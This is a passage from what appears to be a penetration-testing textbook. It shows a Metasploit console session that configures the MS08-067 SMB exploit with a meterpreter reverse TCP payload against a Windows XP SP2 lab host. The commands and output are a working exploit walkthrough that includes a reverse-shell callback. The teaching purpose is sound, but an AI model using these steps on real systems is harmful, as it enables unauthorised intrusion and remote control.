background image

66

Chapter 5

identified as possibly Windows 2003, but the system is missing key ports that 
would be associated with the Server Edition.) We’ll assume that our target is 
running the English version of XP.

Let’s walk through the actual exploitation. First the setup:

msf > 

search ms08_067_netapi 

[*] Searching loaded modules for pattern 'ms08_067_netapi'...

Exploits
========

   Name                         Rank   Description
   ----                         ----   -----------
   windows/smb/ms08_067_netapi  great  Microsoft Server Service Relative Path Stack 
Corruption

msf > 

use windows/smb/ms08_067_netapi 

msf exploit(ms08_067_netapi) > 

set PAYLOAD windows/meterpreter/reverse_tcp 

payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > 

show targets 

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   

3   Windows XP SP2 English (NX)

   4   Windows XP SP3 English (NX)
   5   Windows 2003 SP0 Universal
   6   Windows 2003 SP1 English (NO NX)
   7   Windows 2003 SP1 English (NX)
   8   Windows 2003 SP2 English (NO NX)
   9   Windows 2003 SP2 English (NX)

. . . SNIP . . .

   26  Windows XP SP2 Japanese (NX)

. . . SNIP . . .

msf exploit(ms08_067_netapi) > 

set TARGET 3

target => 3
msf exploit(ms08_067_netapi) > 

set RHOST 192.168.33.130 

RHOST => 192.168.33.130
msf exploit(ms08_067_netapi) > 

set LHOST 192.168.33.129 

LHOST => 192.168.33.129
msf exploit(ms08_067_netapi) > 

set LPORT 8080 

LPORT => 8080
msf exploit(ms08_067_netapi) > 

show options